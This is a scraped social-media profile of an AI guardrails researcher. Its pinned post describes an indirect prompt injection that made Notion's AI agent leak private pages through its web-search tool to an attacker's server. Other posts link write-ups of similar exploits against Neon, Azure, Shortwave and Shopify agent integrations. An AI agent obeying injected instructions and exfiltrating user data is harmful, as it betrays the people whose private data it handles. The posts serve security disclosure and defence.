Olivia
Online
Abi Raghuram
@AbiCodeIntegrit
Working on guardrails for AI systems
Seattle, WA
Joined July 2024
43 Following
303 Followers
152 Posts
Pinned Tweet
We got @NotionHQ to leak your private Notion pages 💀
On Thursday @NotionHQ announced Notion 3.0 with support for custom agents using MCP (built by @AnthropicAI) — powerful, but dangerous.
@simonw calls these MCP related attacks the “lethal trifecta”: the combination of LLMs, tool access, and persistent memory.
Notion’s web-search tool accepts freeform queries as input. With a simple indirect prompt injection we tricked the web search tool into exfiltrating private Notion pages to an attacker controlled server.
Now that Notion supports MCPs, prompt injections can come from many sources (GitHub, Jira, email, etc.). Adding AI agents to Notion poses a major security risk all it takes is one prompt injection for private data to leak.
Read the writeup: https://t.co/zGGUJoPOY0
#makewithnotion
@ay_ushr DMed you, we're solving pretty much this exact problem at https://t.co/iyb4HK71FU
Runtime guardrails like https://t.co/6PVm5uV3nY at the tool invocation level to block tool calls at input or output phase. Guardrails can be written to block tool calls based on expressive combinations of bad input params, output results and know malicious tool calls sequences in a lightweight pythonic DSL
@simonw Definitely agree! Here’s an interesting scenario where e-commerce agents can covertly bias your purchasing decisions - https://t.co/VBURvhDW3W
Weaponizing Shopify MCP for Highly Persuasive Selling - https://t.co/VBURvhDoeo
Hey @davidgomes , we reported the neon MCP vulnerability and got told from the Neon team that this is an inherent issue with all MCPs with write access. Neon needs to warn customers about the massive risks of exposing customer data to threat actors via the Neon MCP -https://t.co/V6qKI9B8TT
Official Azure MCP exploited to leak user's key vault secrets to attackers - https://t.co/T6bln86O7c
Official Azure MCP exploited to leak user's KeyVault secrets to attackers - https://t.co/OCGB8N6QMk
Official Azure MCP can leak user's Keyvault secrets to external attacker - https://t.co/OCGB8N6QMk
@sriramsubram Neon DB MCP exploit our team found - https://t.co/YXtCS4ckh6
Official Neon MCP exploit where attackers can exfiltrate user DB data and trigger unauthorized actions. -https://t.co/YXtCS4ckh6
Shortwave AI Email's MCP integration exploited: attackers exfiltrate users’ emails and other confidential data by hijacking MCPs. - https://t.co/3uK4I2MlIN
@mitsuhiko We wrote runtime guardrails on top of the playwright MCP to constrain it to be more secure/reliable for workflows even with all its tooling - https://t.co/9JkALdYKOm
A Phisher’s White Whale: Shortwave AI Email with MCP Integration - https://t.co/3uK4I2MlIN
Why https://t.co/s5XqpqdsYj AI Email with MCP integration Is a Phisher’s White Whale - https://t.co/3uK4I2MlIN
@simonw What's your opinion on DB companies now powering powerful MCPs to manage DB tasks? Our team found numerous exploits with the official Neon DB MCP where attackers can exfiltrate customer DB data - https://t.co/YXtCS4ckh6
Trends for you
Most Popular Users
Elon Musk
@elonmusk
240.3M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
109.1M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.3M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.6M followers
KATY PERRY
@katyperry
86.9M followers
Taylor Swift
@taylorswift13
80.7M followers
Lady Gaga
@ladygaga
72.3M followers
Kim Kardashian
@kimkardashian
69.4M followers
Virat Kohli
@imvkohli
68.7M followers
YouTube
@youtube
68.6M followers
Bill Gates
@billgates
63.5M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
61.3M followers
X
@x
60.9M followers
Selena Gomez
@selenagomez
60M followers